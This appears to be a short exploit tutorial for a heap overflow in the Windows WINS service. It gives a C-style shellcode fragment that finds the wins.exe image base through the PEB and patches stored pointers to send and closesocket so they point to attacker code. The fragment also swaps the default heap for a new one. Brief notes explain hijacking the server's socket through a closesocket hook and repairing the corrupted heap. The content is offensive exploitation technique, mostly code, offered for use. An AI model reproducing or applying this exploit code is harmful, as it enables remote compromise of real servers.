How to exploit the wins Heap Overflow Vulnerability
newheap = HeapCreateadd(HEAP_GENERATE_EXCEPTIONS, 0x10000, 0);   // private heap that will replace the default heap
i = *(int *)(0x7ffdf008);   // wins.exe image base address (read from the PEB)
j = 0;                      // bitmask: which of the three pointers have been patched
for (k = 0; k < 0x30000; k += 4) {
    if (*(int *)(i+k) == sendadd) {                 // stored pointer to send -> redirect to the new handler
        VirtualProtectadd((i+k) & 0xfffff000, 0x1000, 0x04, &l);   // 0x04 = PAGE_READWRITE
        *(int *)(i+k) = newcalladd;
        VirtualProtectadd((i+k) & 0xfffff000, 0x3000, l, &l);      // restore the old protection
        j ^= 0x1;
        // break;
    }
    if (*(int *)(i+k) == closesocketadd) {          // stored pointer to closesocket -> redirect to newcalladd+5
        VirtualProtectadd((i+k) & 0xfffff000, 0x1000, 0x04, &l);
        *(int *)(i+k) = newcalladd + 5;
        VirtualProtectadd((i+k) & 0xfffff000, 0x3000, l, &l);
        j ^= 0x2;
        // break;
    }
    if (*(int *)(i+k) == ((int)ptr & 0xffff0000)) {  // stored default heap handle -> replace with the new heap
        VirtualProtectadd((i+k) & 0xfffff000, 0x1000, 0x04, &l);
        *(int *)(i+k) = newheap;
        VirtualProtectadd((i+k) & 0xfffff000, 0x3000, l, &l);
        j ^= 0x4;
        // break;
    }
    if (j == 7) break;   // all three values have been patched
}
1. How to reuse the socket
Because the server has threads that continuously receive data, the shellcode must first locate the socket, and it then competes with the server for the incoming data.
The shellcode hooks closesocket; the exploit then sends malformed data so that the server closes the socket. The hook intercepts that call and hands the socket to the shellcode, so the server no longer competes for the data.
2. Heap repair
Create a new heap and use it to replace the default heap.